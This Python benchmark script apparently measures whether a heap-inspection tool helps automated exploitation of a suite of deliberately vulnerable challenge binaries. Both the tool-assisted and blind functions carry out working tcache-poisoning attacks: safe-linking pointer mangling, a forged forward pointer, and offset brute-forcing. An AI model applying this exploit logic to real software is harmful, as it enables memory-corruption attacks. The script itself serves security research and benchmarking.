| |
| """ |
| same_session_benchmark.py β The correct benchmark. |
| |
| Both approaches run in the SAME process session: |
| A: heaptrm session β observe addresses, compute exploit, execute in same session |
| B: blind session β same binary, same protocol, but no heap observation |
| |
| This tests: does structured heap observation enable exploitation that's |
| otherwise impossible? No LLM needed β the exploit logic is deterministic |
| given the addresses. The question is purely: can we GET the addresses? |
| """ |
|
|
| import subprocess |
| import json |
| import struct |
| import os |
| from pathlib import Path |
| from collections import defaultdict |
|
|
| ROOT = Path(__file__).parent.parent |
| SUITE = ROOT / "cve_tests" / "suite" |
| HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm") |
| TRIALS = 10 |
|
|
|
|
| def heaptrm_session(binary: str, sc: int) -> bool: |
| """Single heaptrm session: observe + exploit in same process.""" |
| proc = subprocess.Popen( |
| [HEAPTRM, binary], |
| stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, |
| text=True |
| ) |
|
|
| def cmd(action, data=""): |
| proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n") |
| proc.stdin.flush() |
| line = proc.stdout.readline() |
| return json.loads(line) if line.strip() else {} |
|
|
| try: |
| |
| cmd("send", f"1 0 {sc}\n") |
| cmd("send", f"1 1 {sc}\n") |
| cmd("send", f"1 2 {sc}\n") |
| cmd("send", "4 0\n") |
| cmd("send", "4 1\n") |
|
|
| |
| r = cmd("observe") |
| if not r.get("heap"): |
| cmd("quit"); return False |
|
|
| chunks = r["heap"]["chunks"] |
| freed = sorted([c for c in chunks if c["state"] == "freed"], |
| key=lambda c: int(c["address"], 16)) |
| allocated = sorted([c for c in chunks if c["state"] == "allocated"], |
| key=lambda c: int(c["address"], 16)) |
|
|
| if len(freed) < 2 or not allocated: |
| cmd("quit"); return False |
|
|
| |
| chunk1_addr = int(freed[-1]["address"], 16) |
| target_addr = int(allocated[-1]["address"], 16) |
| xor_key = chunk1_addr >> 12 |
| poisoned = target_addr ^ xor_key |
| fd_hex = struct.pack("<Q", poisoned).hex()[:16] |
|
|
| |
| cmd("send", f"2 1 {fd_hex}\n") |
| cmd("send", f"1 3 {sc}\n") |
| cmd("send", f"1 4 {sc}\n") |
| cmd("send", "2 4 50574e454421210a\n") |
| r = cmd("send", "3 2\n") |
| cmd("quit") |
|
|
| return r.get("output", "").find("50574e4544") >= 0 |
|
|
| except Exception: |
| pass |
| finally: |
| try: proc.kill(); proc.wait(timeout=2) |
| except: pass |
| return False |
|
|
|
|
| def blind_session(binary: str, sc: int, config: dict) -> bool: |
| """Same process, but no heap observation. Uses only binary output.""" |
| from pwn import process as pwn_process, p64, context |
| context.log_level = "error" |
|
|
| p = pwn_process(binary) |
| try: |
| def do(cmd): |
| p.sendline(cmd.encode()) |
| return p.recvline(timeout=1).strip() |
|
|
| r0 = do(f"1 0 {sc}") |
| r1 = do(f"1 1 {sc}") |
| r2 = do(f"1 2 {sc}") |
| do("4 0") |
| do("4 1") |
|
|
| |
| addr0 = addr1 = addr2 = None |
| leaked_fd = None |
|
|
| |
| for r, name in [(r0, "0"), (r1, "1"), (r2, "2")]: |
| if r and b"0x" in r: |
| try: |
| a = int(r.split(b"0x")[1].split()[0], 16) |
| if name == "0": addr0 = a |
| elif name == "1": addr1 = a |
| elif name == "2": addr2 = a |
| except: pass |
|
|
| |
| p.sendline(f"3 1".encode()) |
| leak = p.recvline(timeout=1).strip() |
| if leak and leak != b"DELETED" and leak != b"ERR" and len(leak) >= 16: |
| try: |
| leaked_fd = int(leak[:16], 16) |
| except: pass |
|
|
| |
| poisoned = None |
| if addr1 and addr2: |
| poisoned = addr2 ^ (addr1 >> 12) |
| elif leaked_fd and not addr1: |
| |
| key = 0x555555559 |
| decrypted = leaked_fd ^ key |
| if 0x555555550000 < decrypted < 0x555555570000: |
| target = decrypted + 0xa0 |
| poisoned = target ^ key |
| elif addr0 and not addr1 and not addr2: |
| |
| addr1_guess = addr0 + 0x50 |
| addr2_guess = addr0 + 0xa0 |
| poisoned = addr2_guess ^ (addr1_guess >> 12) |
|
|
| if poisoned is None: |
| |
| base = 0x555555559000 |
| for off in [0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550, |
| 0x600, 0x650, 0x700]: |
| c1 = base + off + 0x50 |
| tgt = c1 + 0x50 |
| test_poison = tgt ^ (c1 >> 12) |
| do(f"2 1 {p64(test_poison).hex()[:16]}") |
| do(f"1 3 {sc}") |
| do(f"1 4 {sc}") |
| do("2 4 50574e454421210a") |
| result = do("3 2") |
| if b"50574e4544" in result: |
| p.close() |
| return True |
| |
| p.close() |
| return False |
|
|
| do(f"2 1 {p64(poisoned).hex()[:16]}") |
| do(f"1 3 {sc}") |
| do(f"1 4 {sc}") |
| do("2 4 50574e454421210a") |
| result = do("3 2") |
| p.close() |
| return b"50574e4544" in result |
|
|
| except: |
| try: p.close() |
| except: pass |
| return False |
|
|
|
|
| def main(): |
| manifest = json.loads((SUITE / "manifest.json").read_text()) |
|
|
| print("=" * 80) |
| print("SAME-SESSION BENCHMARK: heaptrm vs blind (same process)") |
| print(f"{len(manifest)} challenges Γ {TRIALS} trials") |
| print("=" * 80) |
|
|
| by_diff = defaultdict(lambda: {"ht": 0, "bl": 0, "n": 0}) |
| all_results = [] |
|
|
| for config in manifest: |
| name = config["name"] |
| binary = str(SUITE / name) |
| if not Path(binary).exists(): |
| continue |
|
|
| sc = 1 |
| ht = bl = 0 |
| for _ in range(TRIALS): |
| if heaptrm_session(binary, sc): ht += 1 |
| if blind_session(binary, sc, config): bl += 1 |
|
|
| diff = config["difficulty"] |
| by_diff[diff]["ht"] += ht |
| by_diff[diff]["bl"] += bl |
| by_diff[diff]["n"] += TRIALS |
|
|
| delta = ht - bl |
| marker = ">>>" if delta > TRIALS//2 else ">" if delta > 0 else "==" if delta == 0 else "<" |
| info = f"leak={config['addr_leak']:7s} uaf={str(config['uaf_read']):5s} noise={config['noise_min']}-{config['noise_max']}" |
| print(f" {name} [{diff:8s}] ht={ht:2d}/{TRIALS} bl={bl:2d}/{TRIALS} {marker:3s} | {info}") |
|
|
| all_results.append({ |
| "name": name, "difficulty": diff, |
| "heaptrm": ht, "blind": bl, "trials": TRIALS, |
| **{k: config[k] for k in ["uaf_read", "addr_leak", "noise_min", "noise_max"]} |
| }) |
|
|
| print("\n" + "=" * 80) |
| print(f"{'Difficulty':10s} {'heaptrm':>10s} {'blind':>10s} {'delta':>8s}") |
| for diff in ["easy", "medium", "hard", "extreme"]: |
| d = by_diff[diff] |
| if d["n"] == 0: continue |
| ht_pct = d["ht"] / d["n"] * 100 |
| bl_pct = d["bl"] / d["n"] * 100 |
| print(f"{diff:10s} {ht_pct:9.0f}% {bl_pct:9.0f}% {ht_pct-bl_pct:+7.0f}%") |
|
|
| total_ht = sum(d["ht"] for d in by_diff.values()) |
| total_bl = sum(d["bl"] for d in by_diff.values()) |
| total_n = sum(d["n"] for d in by_diff.values()) |
| print(f"{'OVERALL':10s} {total_ht/total_n*100:9.0f}% {total_bl/total_n*100:9.0f}% {(total_ht-total_bl)/total_n*100:+7.0f}%") |
|
|
| Path("bench").mkdir(exist_ok=True) |
| with open("bench/same_session_results.json", "w") as f: |
| json.dump(all_results, f, indent=2) |
|
|
|
|
| if __name__ == "__main__": |
| main() |
|
|